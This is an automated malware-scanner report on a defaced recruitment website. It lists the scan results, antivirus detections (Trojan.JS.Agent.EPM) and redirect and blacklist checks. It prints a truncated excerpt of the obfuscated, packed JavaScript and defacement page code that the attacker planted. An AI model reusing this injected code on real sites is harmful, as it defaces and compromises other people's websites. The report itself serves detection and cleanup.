New scan:

Malware Scanner report for jtwglobaloilandgasrecruiters.com

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

HACKED BY YASSINOX_TN  (15 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://jtwglobaloilandgasrecruiters.com/
200 OK
Content-Length: 8315
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('i 9;$.8.7=n(b){i c={P:10,Q:2,F:10,1y:v,1h:v,19:'1z',C:'1a',K:r,G:r,D:v};k(!b)b=c;i d=$.1Z(c,b);9=$.8.7.1A();E 1B.20(n(){i a=$(1B);k(d.D){d.1C={Z:a.g('Z'),11:a.g('11'),12:a
... 3067 bytes are skipped ...
function(){$('#sp4').typewriter().fadeIn();}, 5000); setTimeout(function(){$('.explode').fly({movement:'float',randomColor:true,destroy:true});}, 15000); setTimeout(function(){$.fn.fly.explosion();}, 18000); setTimeout(function(){hacked();$('#theCredits').fadeIn();animate();}, 23000); }function hacked(){ setTimeout(function(){$('#iHacked').fadeIn(200);}, 100); setTimeout(function(){$('#iHacked').fadeOut();}, 200); setTimeout(function(){hacked()});}function stayHere(){ self.focus();return false;}

Antivirus reports:

nProtect
Trojan.JS.Agent.EPM
Emsisoft
Trojan.JS.Agent.EPM (B)
MicroWorld-eScan
Trojan.JS.Agent.EPM
F-Secure
Trojan.JS.Agent.EPM
GData
Trojan.JS.Agent.EPM
BitDefender
Trojan.JS.Agent.EPM

Deface/Content modification. The following signature was found: HACKED BY YASSINOX_TN


<html>
<head>
<title>HACKED BY YASSINOX_TN</title>
<style>
body {
background-color: black;
background-repeat: no-repeat;
background-attachment: fixed;
background-position: center top;
}
a {
color: #FF0000;
text-decoration: none;
}
a:hover {
color: #fff;
}
#example1 {
font-size: 42px;
font-family: "Share Tech";

...[8815 bytes skipped]...


http://jtwglobaloilandgasrecruiters.com/plugins/system/rokbox/rokbox.js
404 Not Found
Content-Length: 348
Content-Type: text/html
clean
http://jtwglobaloilandgasrecruiters.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: jtwglobaloilandgasrecruiters.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 25 Jan 2015 15:12:07 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 8315
Content-Type: text/html
Last-Modified: Sun, 19 Oct 2014 11:09:48 GMT

...8315 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jtwglobaloilandgasrecruiters.com
Referer: http://www.google.com/search?q=jtwglobaloilandgasrecruiters.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jtwglobaloilandgasrecruiters.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jtwglobaloilandgasrecruiters.com/

Result: jtwglobaloilandgasrecruiters.com is not infected or malware details are not published yet.